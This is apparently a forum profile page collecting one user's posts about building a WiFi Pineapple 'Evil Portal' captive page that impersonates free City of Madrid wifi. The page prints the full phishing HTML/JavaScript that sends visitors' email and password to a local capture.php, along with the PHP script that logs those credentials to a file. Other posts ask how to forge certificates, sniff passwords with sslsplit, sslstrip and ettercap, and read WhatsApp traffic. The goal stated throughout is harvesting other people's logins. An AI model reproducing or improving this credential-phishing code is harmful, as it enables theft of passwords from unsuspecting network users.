-
Posts
192 -
Joined
-
Last visited
Posts posted by daniboy92
-
-
Thanks man. Now this two are fixing... And what about this script?
<script type="text/javascript">
function ajaxRequest() {if (window.XMLHttpRequest) {return new XMLHttpRequest();} else if (window.ActiveXObject) {return new ActiveXObject("Microsoft.XMLHTTP");} else {return false;}}function sendInfo() {var xmlhttp = new ajaxRequest();var emailvalue=encodeURIComponent(document.getElementById("email").value);var redirectvalue=encodeURIComponent(document.getElementById("redirect").value);if (emailvalue != null && emailvalue != "") {var parameters="email="+emailvalue+"&redirect="+redirectvalue;xmlhttp.open("POST", "http://172.16.42.1/capture.php", true);xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");xmlhttp.send(parameters);document.getElementById("results").innerHTML="¡Gracias!";window.location = document.getElementById("redirect").value;} else {document.getElementById("results").innerHTML="Por favor, ingrese su email y su contraseña.";}}function sendInfo2() {var xmlhttp = new ajaxRequest();var passwordvalue=encodeURIComponent(document.getElementById("password").value);var redirectvalue=encodeURIComponent(document.getElementById("redirect").value);if (passwordvalue != null && passwordvalue != "") {var parameters="password="+passwordvalue+"&redirect="+redirectvalue;xmlhttp.open("POST", "http://172.16.42.1/capture", true);xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");xmlhttp.send(parameters);document.getElementById("results").innerHTML="¡Gracias!";window.location = document.getElementById("redirect").value;} else {document.getElementById("results").innerHTML="Por favor, ingrese su email y su contraseña.";}}</script>I don't know if i am sending and collecting fine the information from that two fields "email" "password.This is how my web looks: -
Can you help me with this html? It's another html web, and i have all in order: capture.php in /www folder, 'post' method aiming to http://172.16.42.1/capture.php, but i can't get a working phishing web...
This is the thread:
https://forums.hak5.org/index.php?/topic/33553-help-me-with-this-html-code/
Thanks a lot for all your support newbi3.
-
Hi,
I have problems with a html web. I want a html for summit a loggin information with Evil Portal infusion. Now this html can redirect normally but it doesn't save email and password. I think i'm missing something in this code because i don't have many knowledge about html programming... This is my html code:
<html>
<head><title>$gatewayname Entry</title><meta HTTP-EQUIV="Pragma" CONTENT="no-cache"><script type="text/javascript">function ajaxRequest() {if (window.XMLHttpRequest) {return new XMLHttpRequest();} else if (window.ActiveXObject) {return new ActiveXObject("Microsoft.XMLHTTP");} else {return false;}}function sendInfo() {var xmlhttp = new ajaxRequest();var emailvalue=encodeURIComponent(document.getElementById("email").value);var redirectvalue=encodeURIComponent(document.getElementById("redirect").value);if (emailvalue != null && emailvalue != "") {var parameters="email="+emailvalue+"&redirect="+redirectvalue;xmlhttp.open("POST", "http://172.16.42.1:80/capture.php", true);xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");xmlhttp.send(parameters);document.getElementById("results").innerHTML="¡Gracias!";window.location = document.getElementById("redirect").value;} else {document.getElementById("results").innerHTML="Por favor, ingrese su email y su contraseña.";}}function sendInfo2() {var xmlhttp = new ajaxRequest();var passwordvalue=encodeURIComponent(document.getElementById("password").value);var redirectvalue=encodeURIComponent(document.getElementById("redirect").value);if (passwordvalue != null && passwordvalue != "") {var parameters="password="+passwordvalue+"&redirect="+redirectvalue;xmlhttp.open("POST", "http://172.16.42.1:80/capture", true);xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");xmlhttp.send(parameters);document.getElementById("results").innerHTML="¡Gracias!";window.location = document.getElementById("redirect").value;} else {document.getElementById("results").innerHTML="Por favor, ingrese su email y su contraseña.";}}</script></head><body><center><h2>$gatewayname</h2><font size="1"><i>Ofrecido para usted por la Ciudad de Madrid</i></font><br /><br /><p><font size="2">Para hacer uso del servicio necesita suscribirse con un email y una contraseña.</font></p><div id="results"></div><form id="emailform" method="POST" action="http://172.16.42.1:80/capture.php"><table><tr><td><label>Email</label></td><td><input type="text" id="email" name="email" placeholder="Ingrese su email" required /><td><label>Contraseña</label></td><td><input type="text" id="password" name="password" placeholder="Ingrese su contraseña" required /></tr></table><input type="hidden" id="redirect" name="redirect" value="$authtarget" /><button type="button" onclick="sendInfo();return false;">Ingresar</button></form><p><font size="1"><i>Su información no será compartida con terceras partes.</i></font></p><p><font size="1"><i>Conectándose y haciendo uso de esta red está aceptando los <a href="#">términos del servicio.</a></i></p><img src="images/wifi.png" width="71" height="49" border="0"></center><iframe style="display:none;" src="get"></iframe></body></html>this is my capture.php:<?php
$email = $_POST['email'];$password = $_POST['password'];$redirect = $_POST['redirect'];$file = fopen("evilportalpass.txt", "a");fwrite($file, $email . " " . $password . "\n");fclose($file);echo 'Gracias por elegir $gatewayname <meta http-equiv="refresh" content="2; url=' . $redirect . '" />';?>The location for this file is in /www folder. I don't know if its's a code problem or just a location problem from my capture.php.Hope someone can help me. -
You have to have it running on a webserver. It can't just post to a file in a random location
And what's the correct place to this file? /www folder?
-
You are submitting your form to no where...
<form action="capture" method="post">
The value of action should be the place that you are posting to. Capture is nothing.
It should look like:
<form action="http://172.16.42.1/capture.php" method="post">
Thanks newbi3. 'Capture' it's an url in the same folder of my splash.html, it's aiming to capture.php in my SD.
-
About Evilportal's notifications newbi3 says it's a infusion problem, soon he will be fix that javascript code in the notifications.
-
-
I don't know it ,thanks! I will search it and summit here if i have it or notn
-
Hi everyone,
Just a quick answer: how can i sniff a password an email with a portal with authentication?
-
Can you post your 'process-form-data.php' for me?
I want it for a Captive Portal.
-
Have you tried using a iptable rule for redirect the http traffic to pineapple?
-
-
It's done Kerry!
-
I create a little tutorial with few tips, maybe you can search there and try that tutorial.
-
I'll try to make a little tutorial for dnsspoof, maybe it will be ready today. Just a personal tips to get a working dnsspoof.
-
Contact me vía PM
-
And... We can not falsificate a valid cert? (Stupid question, sorry)
-
Yes, sometimes when I tether my android with the pineapple ?, it's disconnects from pineapple, but the USB cable it's plugged...
-
Yes, pineapple ? do it, but generate a cert that it's detect like fake cert... Tried that other method but it doesn't work...
And... What about WhatsApp sniffing? Someone knows how to get a working sslsplit for this?
-
I was testing it with my phone ? just for sniff WhatsApp's conversations, but it doesn't show anything. Maybe you can do it with your stuff.
-
Unfortunately these logs are very hard to explore. When I was browsing 10 minutes, many lines with ininteligible characters appears and a few appears readable...
Sslsplit it's more recently than sslstrip, but like the other it seems than the actual browsers detects it and doesn't let the victim navigate more...
Also, I can't see what's the utility with WhatsApp, that have a command line in configuration of this infusion. Maybe we need more tests. I am very newbie with this infusion, but it seems uneffective with new and upgrade browsers.
Sorry for bad English.
-
Hello everyone,
I was playing with sslsplit, trying to get some passwords with my phone as a victim. I have two little problems...
1) How to generate a valid ssl cert to avoid Browser's warning...
2) How can i sniff my whatsapp? I've read that sslsplit can do something with Whatsapp, but i was trying and nothing happends.
Sorry if i am doing stupids questions.
Thanks for advance.
One more thing...
3) Webs doesn't show properly, it only shows words, but not images,
-
Just go to "History" into Sslsplit infusion and select "View" or "Download" and search carefully for an email and pass... If you don't find anything just nothing put or use their email and pass, maybe people only navigate without a login.
And thesugarat is rigth, but we can't control what people do with their own Pineapples.
-
If i run sslstrip alone it doesn't show webs correctly, but if i run sslstrip+ettercap both, in ettercap's GUI i can show email and passwords perfectly and webs load fine.
Maybe you should try this.
Help me with this html code
in Security
Posted · Edited by daniboy92
I'm a little more near from my goal...
With your modifications i get a email and created the file perfectly!!
The only thing i need it's to make this html send the password fields and register in the same txt.... Because the password information it's not sending... I don't know why.
So... there is something wrong in the part of sending password information.